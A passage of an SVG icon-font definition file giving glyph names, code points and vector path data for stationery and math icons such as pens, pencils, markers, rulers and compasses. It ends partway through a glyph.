<glyph glyph-name="golden-ratio" horiz-adv-x="1000" unicode="&#xebe6;" d="M417 849v-25c-1-1-3-1-5-2-52-15-90-48-115-97-15-30-24-61-29-93-10-54-11-108-7-162 3-43 10-85 24-125 14-38 34-72 64-100 30-28 65-46 104-56 1 0 1 0 3 0v9c0 138 0 275 0 413 0 28 2 55 3 83 1 17 4 33 8 50 14 49 59 92 109 102 42 9 83 2 122-16 32-15 60-37 85-62 46-48 73-104 85-169 6-34 6-67 6-101-3-80-29-151-75-215-45-62-105-100-176-120-27-8-55-13-83-15-2 0-3-1-6-1v-297h-78v297c-3 0-6 1-9 1-74 8-141 32-199 81-57 49-93 110-110 183-11 49-14 98-10 148 5 53 19 103 47 149 42 67 101 113 178 132 20 5 40 8 60 9 1 0 2 0 4-1z m117-660c24 3 48 9 71 18 58 23 100 62 126 120 15 35 23 72 26 110 3 42 3 83-4 124-5 34-15 68-30 100-12 26-27 50-48 70-20 19-42 32-70 35-20 1-37-5-50-20-11-12-16-26-18-42-3-25-3-50-3-74v-432l0-9z" />
<glyph glyph-name="marker-alt-1" horiz-adv-x="1000" unicode="&#xebe7;" d="M7-44c-6-6-8-15-6-23 1-7 7-14 14-17l84-36c10-4 21-1 29 6l18 19-99 92-40-41z m930 584l2 2c13 13 12 33-1 45l24 26-230 209-24-26-5 5c-16 14-40 13-54-2l-315-328c-6-7-10-15-10-25 1-9 5-17 12-24l-233-238s-4-39 14-86l-60-62 129-120 62 64c48-15 88-11 88-11l234 240 1 0c14-13 36-12 50 2l170 177 33-30-243-253 24-23c8-6 17-10 27-9 10 0 20 4 26 11l328 341c9 10 14 23 14 37 0 14-7 27-17 37l-46 41z m-235 138l-210-217c-7-7-17-11-27-11-9 0-18 3-26 10-15 14-15 37-1 51l209 217c14 15 38 16 53 2 15-14 16-37 2-52z" />
<glyph glyph-name="marker-alt-2" horiz-adv-x="1000" unicode="&#xebe8;" d="M0-90c42-15 80-28 118-41h8c8 10 16 20 22 27-27 29-53 57-74 80-25-23-49-44-74-66z m983 788c-36 35-71 71-107 106-35 35-41 36-79 3-177-153-354-306-532-458-7-7-17-12-26-17 91-89 174-172 260-259 165 191 328 380 491 569 18 21 10 39-7 56z m-851-481c-8-10-14-30-10-43 18-58 25-113-18-156 29-32 54-60 69-76 48 8 90 28 122 18 62-19 101-1 137 45 9 12 24 21 34 30-90 89-173 173-261 261-24-24-50-50-73-79z" />
<glyph glyph-name="marker-alt-3" horiz-adv-x="1000" unicode="&#xebe9;" d="M8-91c3-4 3-4 7-4l136-26c3 0 10 0 13 3l50 50 13-13 40 39 176 10 535 555c30 30 30 76 0 106l-166 170c-30 30-77 30-107 0l-558-532-9-176-40-40 13-13-106-106c-4-4-7-10-4-17l7-6z m654 710l136-136-275-275-136 136 275 275z" />
<glyph glyph-name="marker" horiz-adv-x="1000" unicode="&#xebea;" d="M941 664c-90 58-180 115-269 174-28 18-48 17-70-10-117-152-236-302-354-453-12-14-23-30-15-50 24-66 35-131 10-191-8-30 5-43 22-53 49-33 99-64 148-98 22-15 40-12 60 3 48 38 102 60 162 67 26 3 42 17 55 40 88 168 176 335 266 502 16 30 13 51-15 69z m-64-79c-75-138-148-278-222-417-5-10-8-23-24-25-10 6-20 11-30 18-87 56-173 113-261 168-26 16-25 28-7 50 98 124 196 247 292 372 16 21 29 22 50 8 63-43 127-85 192-125 24-15 21-28 10-49z m-649-582l-77-119h188l35 60-102 68c-14 10-34 5-44-9z m103-133h-286c-6 0-10-4-10-10s4-10 10-10h286c6 0 10 5 10 10s-4 10-10 10z" />
<glyph glyph-name="math" horiz-adv-x="1000" unicode="&#xebeb;" d="M856 736h-712c-45 0-81-37-81-82v-608c0-45 36-82 81-82h712c45 0 82 37 82 82v608c0 45-37 82-82 82z m0-690h-427c-8 23-30 39-55 39h-135c-25 0-47-16-55-39h-40v608h712v-608z m-285 506c-8 0-14-1-20-2l-49-119-48 119c-7 1-15 2-22 2-7 0-15-1-22-2l-8-207c6-1 12-2 19-2 5 0 11 1 18 2l4 143 39-100c3 0 5-1 8-1 2 0 5 0 7 0 3 0 6 0 9 0 3 0 5 1 8 1l42 98 5-141c7-1 13-2 20-2 6 0 13 1 21 2l-10 207c-7 1-14 2-21 2z m-276-359v29h32c0 3 1 6 1 9 0 3-1 7-1 10h-32v23h40c1 3 1 7 1 10 0 3 0 6-1 9h-62v-109h63c1 3 1 7 1 10 0 3 0 6-1 9l-41 0z m73 28c-1-3-1-6-1-10 0-3 0-6 1-9h63c1 3 1 6 1 10 0 3 0 6-1 9h-63z m0 31c-1-3-1-6-1-10 0-3 0-6 1-9h63c1 3 1 7 1 10 0 3 0 6-1 9h-63z m186 2c-5 0-10-1-14-4-3-3-6-6-8-9-4 9-11 13-24 13-2 0-5 0-7-1-3 0-5-1-6-3-2-1-4-2-5-4-1-1-2-3-3-4 0 1 0 1-1 2 0 1 0 2 0 3l-1 3c0 1 0 2-1 3-1 0-2 0-4 0-1 1-3 1-4 1-2 0-4-1-5-1-1 0-3 0-4 0v-78c3-1 7-1 11-1 3 0 7 0 10 1v41c0 4 1 7 1 10 1 2 2 4 4 6 1 1 3 2 4 3 2 0 4 1 5 1 4 0 7-2 9-5 1-3 2-7 2-12v-44c3-1 7-1 10-1 4 0 7 0 11 1v42c0 4 0 7 1 9s2 5 4 6c1 1 2 2 4 3 2 0 3 1 5 1 4 0 7-2 8-5 2-3 2-7 2-12v-44c4-1 8-1 11-1 4 0 7 0 11 1v49c0 11-2 18-7 23-3 5-10 7-19 7z m109-61c-1-1-3-1-4-2-1 0-3 0-4-1-1 0-2 0-4 0-1 0-2 0-4 0-6 0-10 2-14 6-3 3-5 9-5 17 0 8 2 14 5 18 3 4 8 6 14 6 3 0 6 0 8-1 2 0 5-1 8-2 1 3 2 6 3 9 0 3 1 5 1 7-2 1-4 2-6 2-2 1-4 1-5 2-2 0-4 0-6 0-2 0-4 0-6 0-6 0-11-1-16-3-5-2-9-5-12-9-3-3-6-8-7-13-2-5-2-10-2-16 0-5 0-11 2-16 2-5 4-9 7-13 3-3 7-6 12-8s11-3 17-3c4 0 8 0 11 0s8 2 12 3c0 4-1 7-2 10-1 3-2 5-3 7z m47 43l5 6c2 2 3 4 5 6 1 2 3 4 4 6 1 2 1 4 2 6 1 2 1 4 1 6 0 3-1 6-2 8-1 2-2 4-4 5-2 1-4 2-7 3-2 1-5 1-8 1-2 0-4 0-5 0-1 0-3 0-4-1-1 0-2 0-3-1-2 0-3-1-4-1 0-2 0-4 1-5 0-2 1-4 2-5 1 0 1 0 2 1l3 1c1 0 2 0 3 0 1 0 2 0 3 0 3 0 6 0 7-2 2-1 3-3 3-5 0-2 0-3-1-5 0-1-1-3-2-4-1-2-3-4-4-6s-4-4-6-7l-13-17 1-1h40c0 2 1 4 1 6 0 1-1 3-1 5l-19 0z" />
<glyph glyph-name="mathematical-alt-1" horiz-adv-x="1000" unicode="&#xebec;" d="M0 375h462v462h-462v-462z m128 254h79v80h47v-80h80v-47h-80v-79h-47v79h-79v47z m-128-766h462v462h-462v-462z m128 254h206v-47h-206v47z m410 720v-462h462v462h-462z m336-287l-34-34-56 56-56-56-33 34 56 56-56 56 33 33 56-56 56 56 34-33-56-56 56-56z m-336-687h462v462h-462v-462z m278 123c-2-5-4-9-8-12-3-3-7-6-12-8-5-3-10-4-15-4-5 0-10 1-15 4-5 2-9 5-12 8-4 3-6 7-8 12-2 5-3 10-3 15 0 6 1 11 3 15 2 5 4 9 8 12 3 4 7 6 12 9 5 2 10 3 15 3 5 0 10-1 15-3 5-2 9-5 12-9 4-3 6-7 8-12 2-4 3-9 3-15 0-5-1-10-3-15z m-70 215c2 5 4 9 8 13 3 3 7 6 12 8 5 2 10 3 15 3 6 0 10-1 15-3 5-2 9-5 12-8 4-4 6-8 8-13 2-4 3-9 3-15s-1-10-3-15c-2-4-4-8-8-12-3-3-7-6-12-8-5-2-9-3-15-3-5 0-10 1-15 3-4 2-9 5-12 8-4 4-6 8-8 12-2 5-3 10-3 15s1 11 3 15z m-65-79h207v-58h-207v58z" />
<glyph glyph-name="mathematical-alt-2" horiz-adv-x="1000" unicode="&#xebed;" d="M251 480h51v87h85v52h-85v88h-51v-88h-85v-52h85v-87z m473-184l60-62 36 37-60 62 60 62-36 37-60-62-60 62-36-37 60-62-60-62 36-37 60 62z m-558 54h221v-52h-221v52z m462 357h221v-52h-221v52z m0-98h221v-52h-221v52z m372 215h-1000v-688h365l-126-260h97l43 90h224l43-90h98l-126 260h382v688z m-589-792l50 104h60l50-104h-160z m546 149h-914v599h914v-599z" />
<glyph glyph-name="mathematical" horiz-adv-x="1000" unicode="&#xebee;" d="M848 358v47l-7 3c-2 1-58 22-133 22-41 0-79-6-114-19l-12 52c29 4 50 9 50 9v53s-27-6-62-10l-17 71h13v119h-44v93h-46v-93h-43v-119h12l-16-71c-35 4-63 10-63 10v-53s22-5 51-9l-11-49c-33 11-68 16-106 16-75 0-131-21-133-22l-7-3v-44c-22-4-36-12-36-24v-453h333c12-10 29-17 48-17 19 0 36 7 47 17h326v453c0 10-12 17-30 21z m-267 48c-9-4-19-9-27-13l-16 65c10 1 20 2 30 3l13-55z m-25 107c-10-1-20-2-30-2l-18 75h31l17-73z m-44-3c-4 0-8 0-12 0-4 0-9 0-13 0l12 53 13-53z m-66 181h106v-91h-106v91z m13-105h32l-18-75c-10 0-20 1-30 2l16 73z m-28-125c9-1 19-2 30-3l-15-61c-9 4-18 8-28 12l13 52z m69-541c-27 11-123 48-218 48-38 0-72-6-100-18v440c16 6 62 19 118 19 73 0 136-22 188-66v-262l12 14v-175z m4 438c-14 13-29 23-45 32l15 68c9-1 18-1 26-1 8 0 16 0 24 0l17-72c-13-8-25-17-37-27z m322-408c-31 13-66 19-105 19-95 0-186-37-213-49v175l12-14v262c52 44 115 66 188 66 56 0 101-13 118-19v-440z m-826 778l11-440 35 42 10 12 379 462-435-76z m358 14l-9-12-7-8-7-9-7-8-10-12-7-8-7-9-7-8-9-12-14-17-7-8-10-12-6-9-8-8-6-9-9-11-1 1-5-7-5-9-8-8-7-9-9-12-7-8-8-9-6-8-10-12-7-8-7-9-7-8-10-13-7-8-7-9-7-8-9-11-7-8-7-9-7-8-10-13-6-8-8-9-6-8-22-25-9 374 367 63-21-25-7-9z m-276-259l180 218-185-32 5-186z m133 191l-116-140-2 120 118 20z m455 159l-87-83 330-345 87 84-330 344z m226-380l-10 11-22 23-48 50-15 16-32 33-16 17-10 10-12 12-10 11-14 15-22 23-11 11-15 16-11 11-11 12-10 10-14 15 56 54 301-314-56-54-18 18z" />
<glyph glyph-name="pen-alt-1" horiz-adv-x="1000" unicode="&#xebef;" d="M522 211c-209-188-471-393-506-357-36 37 164 305 348 519l158-162z m446 308l-75 76c33 49 43 84 40 111l55 57-85 87-57-58c-47 5-117-32-245-163-47-48-106-113-166-183l159-164c69 62 132 122 180 170 33 35 60 65 82 92l47-47-151-155c-12-12-12-32 0-44 12-13 31-13 43 0l173 176c12 13 12 32 0 45z" />
<glyph glyph-name="pen-alt-2" horiz-adv-x="1000" unicode="&#xebf0;" d="M819 613l29 38c40 53 32 129-18 171l-2 1c-49 42-121 34-161-19l-29-38 181-153z m-176-321c1-9 6-18 13-24 15-13 37-10 49 5l198 263c12 16 9 39-6 51-15 12-37 9-48-6l-20-26-33 28 0 0-180 153-463-611 181-153 419 554 33-28-135-179c-6-8-9-18-8-27z m-339-348l-170 144c-3-10-5-19-5-19l-39-198c-2-14 11-26 24-19l174 83c0 0 7 4 16 9z" />
<glyph glyph-name="pen-alt-3" horiz-adv-x="1000" unicode="&#xebf1;" d="M269 850l-76-500c230-167 269-500 269-500h24v523c-25 8-44 31-44 60 0 35 26 63 58 63 32 0 58-28 58-63 0-28-19-52-43-60v-523h24s38 333 269 500l-77 500h-462z" />
<glyph glyph-name="pen-holder-alt-1" horiz-adv-x="1000" unicode="&#xebf2;" d="M768 490l-76-638v-2h-383l-76 639h79l-29 206 76 10 30-216h50l-12 138 76 6 13-144h59l2 249h77s20-2 40-16c17-11 27-30 29-53 2-43 2-97 2-100-1-8-8-15-17-17h-3c-11 1-19 9-19 19 0 1 1 55-2 96-1 12-6 22-14 28-5 4-13 6-19 6l-1-211h118z m-488 225l75 9-2 17-76-9 3-17z m-6 35l76 9-3 17-75-9 2-17z m-5 35l76 9-3 18s-3 43-43 38c-40-5-32-47-32-47l2-18z m156-138l76 5-2 18-76-6 2-17z m-4 35l76 6-1 17-76-5 1-18z m-3 35l76 6-2 18s-2 43-42 41c-41-4-34-46-34-46l2-19z m233 57h-17v54h-38v-54h-21v-18h76v18z" />
<glyph glyph-name="pen-holder" horiz-adv-x="1000" unicode="&#xebf3;" d="M690 427l145 257-179 100-154-274 148-83h40z m-95 114c-3-1-7 0-10 1l-9 6c-6 3-9 11-5 17l82 146c2 3 4 5 8 6 3 1 6 1 9-1l10-6c6-3 8-11 5-17l-82-146c-2-3-5-5-8-6z m-4-114h-136l33 58 103-58z m326 222l-125-222h-72l162 288 20-12c19-11 26-35 15-54z m-93 73l-150 84c23 42 76 56 117 33 41-23 56-76 33-117z m-653-295h42l-13 49c-1 3 0 5 1 8 2 2 4 4 7 5l10 3c6 1 13-2 14-8l15-57h111l-56 212-174-45 43-167z m16 142l10 3c6 1 12-2 14-8l5-21c1-2 1-6-1-8-1-3-4-5-7-5l-10-3c-3-1-6 0-9 1-2 2-4 4-5 7l-5 20c-2 6 2 12 8 14z m-77 90l175 46 12-48-174-45c0-1-13 47-13 47z m-4 18l174 45-17 65c-6 21-27 34-48 28l-99-26c-10-2-18-9-23-18-6-9-7-19-4-29l17-65z m122 105l8-34-105-28-9 34 106 28z m-131-403h-19l116-490v-1c0-21 113-38 252-38 131 0 239 15 251 35h1l115 494h-716z m173-450c-3-1-6-1-8-1-16 0-31 11-35 27l-77 305c-5 19 7 38 26 43 19 4 38-7 43-26l77-305c5-19-7-38-26-43z" />
<glyph glyph-name="pen" horiz-adv-x="1000" unicode="&#xebf4;" d="M531 742c-26-76-50-153-74-230-1 0-1-1-1-1 0-1 8-4 16-7 34-11 67-21 101-32 9-3 17-3 18 0 0 1 1 3 2 5 23 71 46 142 68 213 11 34 2 65-23 84-38 27-92 12-107-32z m-162-600l70-23c9-3 18 2 21 11 33 103 66 206 100 310 3 9-2 18-11 21-23 7-47 15-70 22-9 3-18-2-21-10-33-104-67-207-100-310-3-9 2-18 11-21z m123 592c-8 3-17-2-20-11-32-99-64-199-96-298-3-9 2-18 10-21s17 2 20 11c32 100 64 199 96 299 3 8-1 18-10 20z m-137-758c8-3 19 1 24 9 20 33 39 66 59 100 5 8 2 16-7 19-22 7-43 14-64 21-9 3-17-2-17-12-3-38-6-77-9-116-1-9 5-18 14-21z m-21-64c0 0 5 6 9 14 3 6 7 11 10 16 4 8 3 16-3 18-7 2-13-4-14-13 0-6-1-12-1-18-1-9-1-16-1-17z" />
<glyph glyph-name="pencil-alt-1" horiz-adv-x="1000" unicode="&#xebf5;" d="M306 247l171 380c-26 6-56 10-89 12l-155-358c32-6 57-21 73-34z m450 478l-249 122c-14 7-29 1-35-12l-64-149c149-18 245-75 305-130l57 133c5 14-1 30-14 36z m-65-223c-10 15-26 34-51 54l-168-374c29-5 53-18 70-32l149 352z m-349-272c43-5 73-21 92-34l172 383c-24 14-53 28-89 39l-175-388z m6-282c-22 17-58 36-108 44l7-142 101 98z m173 168c-18 14-45 29-79 27l-9 0-7 7c-1 2-39 43-114 43h-9l-6 7c-2 2-27 33-69 41l10-208c66-8 111-35 139-57l144 140z" />
<glyph glyph-name="pencil-alt-2" horiz-adv-x="1000" unicode="&#xebf6;" d="M667 744l106 106 227-227-107-106-226 227z m-24-25l226-226-515-515-226 227z m-352-805l-291-64 64 291 24 24 227-226z" />
<glyph glyph-name="pencil-alt-3" horiz-adv-x="1000" unicode="&#xebf7;" d="M488-137c-57 55-113 111-170 166-8 7-11 14-11 24 0 145 0 290 0 435v20h385c0-3 1-5 1-7 0-151 0-301 0-452 0-5-4-12-8-16-13-15-28-28-42-42-47-46-94-92-144-141-5 5-7 10-11 13z m108 271v280h-95v-280h95z m-128-184c3-3 8-4 12-4 45-2 45-2 78 30 21 20 42 40 65 62h-246c31-30 61-59 91-88z m-160 831c0 38 37 69 76 69h229c45 0 80-34 80-78 0-56 0-112 0-168v-35h-386c0 72 0 142 1 212z m287-118v92h-94v-92h94z" />
<glyph glyph-name="pencil-alt-4" horiz-adv-x="1000" unicode="&#xebf8;" d="M317 850h212v-483h-212v483z m250 0h116v-483h-116v483z m-22-872h-90l45-128 45 128z m8 37l130 315h-366l130-315h106v0z" />
<glyph glyph-name="pencil" horiz-adv-x="1000" unicode="&#xebf9;" d="M321 134c58-19 117-37 176-56 9-3 18 2 21 11 49 152 97 303 145 456 3 9-2 18-11 21-58 19-117 37-176 56-9 3-18-2-21-11-48-152-97-303-145-456-3-9 2-18 11-21z m154 25c39 122 77 243 116 365 3 9 12 14 20 11s13-11 10-20c-39-122-78-244-117-365-2-9-11-14-20-12-8 3-12 12-9 21z m-60 19c39 122 78 243 117 365 3 9 11 14 20 11 8-2 12-12 9-21-39-122-77-243-116-365-3-8-12-14-20-11-8 3-13 12-10 21z m-49-2c-9 3-13 12-10 21 39 122 77 243 116 365 3 9 12 14 20 11 8-2 13-12 10-20-39-122-78-244-117-366-2-9-11-14-19-11z m140 577c17 29 45 40 71 32 30-9 59-19 88-28 15-5 26-14 31-29 5-12 8-26 8-39 0-26-10-48-18-72-3-9-12-14-21-11-59 19-117 37-176 56-9 3-14 11-12 18 1 5 2 9 4 13 8 20 14 42 25 60z m-45-708c8-2 16-4 24-7 9-3 10-10 3-16-44-36-86-71-130-106-7-6-15-4-17 5-15 54-30 108-45 162-2 9 3 14 12 11 7-2 13-4 20-6 3-2 131-42 133-43z" />
<glyph glyph-name="ruler-alt-1" horiz-adv-x="1000" unicode="&#xebfa;" d="M1000 94h-759c0 44 0 87 0 131 0 70 0 140 0 209 0 77 0 153 0 230 0 55 0 109 0 164 0 3 0 6-1 10h-240v-976h1000v232z m-808 93h-47v-46h47v-46c-4 0-8 0-11 0-25 0-50 0-76-1-3 0-9-2-9-4 0-14 0-28 0-43h96v-46h-47v-47h47v-45h-12c-39 0-79 0-119 0-13 0-13 0-13 13 0 124 0 248 0 373 0 159 0 318 0 478v17h144v-46h-47v-46h47v-46h-95v-47h95v-46h-47v-47h47v-46h-13c-25 0-50 1-75 0-3 0-8-3-8-5 0-13 0-27 0-42h96v-47h-47v-46h47v-45c-6 0-11 0-15 0-24 0-48 0-72 0-4 0-9 1-9-6 0-14 0-27 0-42h96v-46z m758-278h-709c0 14 0 28 0 43 0 32 0 64 0 96h35v-46h49v45h48v-92c15 0 30-1 44 0 2 0 5 6 5 9 0 25 0 49 0 74 0 3 0 6 1 9h46v-45h49v45h47v-92h49v92h48v-45h48v45h48v-92h49v92h48v-45h48v45h47v-138z" />
<glyph glyph-name="ruler-alt-2" horiz-adv-x="1000" unicode="&#xebfb;" d="M15-150c324 334 646 667 970 1000v-1000h-970z m458 195h323v333l-323-333z m425 471c-4 7-7 13-10 16-26 27-52 53-77 80-10 9-19 10-27 2-8-8-7-18 2-28 14-14 28-29 42-43 12-13 24-25 36-37 6-6 13-9 20-5 5 4 9 10 14 15z m-466-269c-5-4-11-7-14-13-5-7-2-15 4-22l79-80c8-9 18-9 26-2 7 8 7 19-2 27-26 27-52 54-78 81-3 4-8 5-15 9z m-98-311c5 4 12 7 14 13 5 7 2 15-4 21-26 27-52 54-79 81-8 9-19 9-26 1-7-7-7-18 1-26 27-28 53-55 80-82 3-3 8-5 14-8z m379 397c-1 2-2 7-4 10-27 28-55 56-82 84-4 3-12 5-17 4-13-3-17-19-8-29 27-29 54-56 82-84 1-2 2-3 4-3 12-7 26 2 25 18z m-156-91c-3 6-4 11-6 13-15 17-30 33-46 48-7 7-17 6-23-1-7-6-8-17-1-24 15-16 30-33 46-47 4-4 13-4 18-2 5 2 8 9 12 13z m181 187c-2 6-3 10-5 12-15 17-31 34-48 50-6 6-16 4-22-2-6-6-8-16-2-23 16-17 32-33 49-49 3-3 12-3 17-1 5 2 8 9 11 13z m-121-124c-3 6-4 11-7 14-14 15-29 31-44 46-7 6-17 6-24 0-6-6-8-17-1-25 15-16 30-32 46-47 4-3 13-4 18-2 5 2 8 9 12 14z m-182-188c-1 6-2 9-4 11-16 18-32 35-50 52-6 6-15 3-21-3-6-7-8-16-1-22 15-18 31-34 48-50 3-3 12-3 17-1 5 2 8 9 11 13z m-60-62c-2 6-3 10-6 13-15 16-30 33-46 48-7 7-17 6-23-1-6-6-8-17-2-23 16-17 31-34 48-49 4-3 13-3 18-1 5 2 7 9 11 13z m360 504c-5-4-11-7-14-12-5-8-3-15 3-22 14-14 28-28 42-43 8-8 18-8 26-1 7 7 7 18-1 26-14 15-28 29-42 43-3 4-8 5-14 9z" />
<glyph glyph-name="ruler-compass-alt" horiz-adv-x="1000" unicode="&#xebfc;" d="M947 347s-40-8-90-14l-24 103h18v171h-62v135h-67v-135h-62v-171h18l-24-103c-50 6-90 14-90 14v-76s31-7 73-12l-72-314 20-5-6-27 13-3-2-12 7-1 2 12 16-4 6 27 23-5 76 323c12 0 25-1 37-1 11 0 23 1 35 1l76-323 23 5 6-29 15 4 3-12 7 1-2 12 12 3-6 29 21 5-73 314c42 5 73 12 73 12v76z m-268 240h153v-132h-153v132z m-50-637l-41 10 69 296c14-2 28-3 43-4l-71-302z m89 377c-15 1-30 2-44 4l24 105h45l-25-109z m39-1c-7 0-13 0-19 0l18 77 18-77c-6 0-12 0-17 0z m11 110h45l24-105c-14-2-29-3-43-4l-26 109z m155-476l-41-10-71 301c15 2 30 3 44 5l68-296z m-871 563l231-673 33 82 0 0 10 24 358 894-632-327z m544 195l-10-23-43 17-6-15 43-18-7-17-29 12-7-16 30-12-9-24-44 18-6-16 43-18-7-17-29 12-7-16 30-12-9-21-43 17-6-16 43-17-7-18-29 12-7-16 30-12-9-23-44 17-6-16 43-17-6-18-30 12-7-16 30-11-8-22-1 1-4-12-33 13-6-16 34-14-7-17-20 8-7-16 21-8-10-24-34 14-6-16 34-13-7-18-20 9-7-16 21-8-10-24-38 16-6-16 38-15-7-18-24 10-7-16 25-10-10-23-38 15-6-16 38-15-7-17-24 10-7-16 25-10-9-22-38 15-6-16 38-15-7-17-24 10-7-16 24-10-9-23-38 15-6-16 37-15-6-17-24 9-7-16 24-9-20-50-196 571 533 276-20-50-25 10-7-16 26-10z m-299-534l170 424-267-138 97-286z m3 87l-63 184 172 89-109-273z" />
<glyph glyph-name="ruler-compass" horiz-adv-x="1000" unicode="&#xebfd;" d="M868 362s-44-9-100-16l-26 116h20v194h-68v153h-74v-153h-69v-194h20l-26-116c-55 7-99 16-99 16v-87s34-7 80-13l-79-355 22-6-6-31 14-3-3-13 8-2 3 13 17-3 6 30 26-6 83 367c14-1 28-2 41-2 12 0 25 1 38 1l84-366 25 6 7-33 17 4 3-13 8 2-3 13 14 3-7 34 23 5-80 355c46 7 81 14 81 14l0 86z m-295 272h168v-149h-168v149z m-55-721l-45 10 75 336c16-2 32-4 48-5l-78-341z m97 426c-16 1-32 3-48 4l27 119h50l-29-123z m43-1c-7 0-14 0-21 0l20 87 20-87c-6 0-13 0-19 0z m13 124h49l27-119c-16-1-32-3-48-4l-28 123z m171-539l-46-10-78 341c17 1 33 3 48 5l76-336z m-709-55h241v982h-241v-982z m41 939h158v-52h-75v-32h75v-33h-49v-31h49v-46h-75v-31h75v-34h-49v-31h49v-46h-83v-31h83v-33h-57v-31h57v-47h-83v-31h83v-33h-57v-31h57v-43h-83v-31h83v-34h-57v-31h57v-46h-83v-31h83v-34h-57v-31h57v-42h-158v896z" />
<glyph glyph-name="ruler-pencil-alt-1" horiz-adv-x="1000" unicode="&#xebfe;" d="M164 844c14 0 29 1 44 1 97 0 194 0 291 0 9 0 12-2 12-11 0-324 0-648 0-972v-12h-336c-4 0-8 0-12 0l1 994z m316-962v10c0 304 0 607 0 911 0 9-3 12-12 11-88 0-176 0-263 0-4 0-7 0-10 0v-37h148v-21h-148v-56h85v-21h-85v-56h85v-21h-85v-55h147v-21h-147v-56h85v-21h-85v-56h85v-21h-85v-56h148v-21h-148v-55h85v-21h-85v-56h85v-21h-85v-56h147v-21h-147v-55h85v-22h-85v-56h85v-20h-85v-30l285 0z m320 968c36-13 36-13 36-52 0-37 0-74 0-111 0-7-2-10-9-10-83 0-167 0-250 0-1 0-2 1-5 1v10c0 39 1 78 0 116-1 23 6 40 29 46h199z m-36-738h-119v552h118v-552z m72-25c-2-4-4-7-6-10-21-35-42-71-63-107-3-5-6-7-12-5-36 7-72 6-108-4-24 42-49 84-74 126h263z m-263 577h36v-552h-36v552z m226 0h37c0-5 0-9 0-13 0-176 0-352 0-527 0-10-2-14-12-13-8 1-16 1-25 1l0 552z m-41-721c-18-30-35-59-53-90-18 30-35 58-52 88 35 9 69 9 105 2z" />
<glyph glyph-name="ruler-pencil-alt-2" horiz-adv-x="1000" unicode="&#xebff;" d="M371 833h239v-969h-239v969z m210-485c-1 52-1 103-1 155 0 96 0 192 1 288 0 7-1 11-10 11-54 0-107 0-161 0-7 0-9-2-9-8 0-18 1-36 0-54 0-8 2-11 11-11 18 1 18 0 20 18 0 2 3 4 4 6 2-2 4-4 5-6 1-2 1-4 0-6-1-9 2-12 11-12 21 1 42 1 63 0 10 0 17-7 17-16-1-9-8-15-18-15-14 0-27 0-41 0-34 0-34 0-32-34 1-6 2-9 8-9 7 1 13 0 20 1 5 0 11-1 11-8 0-7-5-9-11-9-6 0-13 0-19 0-6 1-9-1-9-8 1-11 1-23 0-34 0-7 3-9 10-9 7 0 15 1 22 0 3-1 7-5 7-8 0-3-4-6-7-8-3-1-7 0-11 0-21 0-21 0-21-22 0-9-2-21 3-27 4-5 16-2 25-2 6 0 12-2 11-9-1-3-7-6-11-7-9-2-22 1-26-4-5-6-1-19-2-28 0-9 2-11 10-11 21 0 41 0 62 0 11 0 19-7 19-16-1-9-8-15-20-15-17 0-34 0-52 0-22 0-19 3-19-20 0-23 0-23 23-23 6 0 16 3 16-8 0-10-9-8-16-8-22 0-22 0-23-23 0-27 0-27 26-28 1 0 3 1 3 0 4-3 7-6 10-8-3-3-6-7-10-8-7-1-15 0-22 0-2-1-6-5-6-7-1-13-1-25 0-37 0-3 4-7 6-7 8-1 16 0 23-1 4 0 6-4 9-7-3-3-5-7-9-8-7-1-14-1-21-1-6 1-9-1-9-8 1-8 1-16 0-24-1-8 3-10 11-10 20 0 40 0 60 0 12 0 19-6 19-15 1-10-7-16-19-17-13 0-26 1-39 0-10 0-25 3-29-2-6-7-2-21-3-32 0-6 2-8 8-8 7 0 15 1 22 0 4-1 6-6 9-9-3-2-5-6-9-7-7-1-15 0-22 0-5 0-8-2-8-8 0-11 0-23 1-35 0-3 4-7 7-8 7-1 15 1 22-1 3 0 6-5 9-7-3-3-6-8-9-8-7-2-14-1-20 0-8 0-10-3-10-10 0-41 0-82 0-122 0-9 3-11 11-11 38 0 76 0 114 0 14 0 14 0 14 14 1 146 1 293 1 439z m-149-382c0 17 0 33 0 50 0 23 5 21-21 21-8 1-10-2-10-10 0-37 0-73 0-110 0-28-3-21 22-22 7-1 9 2 9 9 0 21 0 41 0 62z m0 580c-1 30 5 25-23 26-6 0-8-2-8-8 0-10 1-20 0-30-1-11 3-14 14-14 19 1 17-1 17 19v7z m0 67c0 6 0 13 0 19 0 3-3 6-5 7-7 1-14 1-20 0-2 0-5-4-6-6 0-13 0-26 0-38 1-2 4-6 6-7 23-3 25-2 25 22 0 1 0 2 0 3z m0-267c0 27 0 27-23 26-6 0-8-2-8-8 0-11 1-22 0-33 0-8 3-10 10-10 25 0 21-3 21 21 0 1 0 2 0 4z m-31-66c0-29 0-29 23-27 1 0 1 0 1 1 2 2 6 4 6 6 1 13 1 25 0 38 0 2-3 6-6 6-22 4-24 2-24-21 0-1 0-2 0-3z m0-201c0-27 0-27 23-26 6 1 8 3 8 9 0 11 0 22 0 33 0 7-2 10-9 10-26-1-21 2-22-22v-4z m0 405c0-27-2-21 22-22h2c5 0 7 2 7 8 0 8 0 17 0 25 1 8-2 10-10 10-20-1-20 0-21-21z m31-74c-1 23 4 20-21 21-1 0-1-1-2 0-5 0-8-2-8-8 0-9 0-19 1-28 0-2 3-6 5-7 23-3 25-1 25 22z m-31 267c0-21 0-22 12-21 22 0 19-3 19 19 0 5 0 11 0 17-1 2-4 5-6 6-22 4-25 1-25-21z m0-460c1-26-4-21 22-22 7-1 9 2 9 9 0 8 0 15 0 23 1 8-3 11-10 10-25-1-20 3-21-20z m0-75c0-3 0-7 0-11-1-7 2-11 10-10 25 1 20-3 21 21 0 5 0 10 0 15-1 2-3 5-5 6-20 5-26 0-26-21z m-317 465h177v-45c0-158 0-317 0-475 0-10-2-20-5-29-23-58-46-115-68-173-1-1-1-2-2-3-3-7-6-16-15-14-5 2-11 8-14 14-16 39-31 78-46 117-3 7-5 14-8 21-17 31-20 65-19 100 0 158 0 317 0 475v12z m35-265c0-66 0-132 0-198 0-5 0-11 2-16 2-8 8-13 16-14 9 0 15 5 18 14 1 4 1 8 1 12 0 135 0 270 0 406 0 3 0 7-1 11-3 9-9 14-18 13-9 0-15-6-17-14-1-7-1-13-1-20 0-65 0-129 0-194z m-1-264c10-23 18-45 27-67 9-23 9-23 33-23 8 0 12 2 15 10 9 23 18 46 27 69 2 4 2 7 4 11h-106v0z m797 242c0-96 0-193 1-289 0-10-4-12-13-12-36 0-72 0-107 0-8 0-11 2-11 10 1 69 0 137 0 205 0 38 1 75 0 112 0 22-8 40-28 52-2 1-5 6-5 10-1 68-1 136-1 205 0 7 3 8 9 8 49 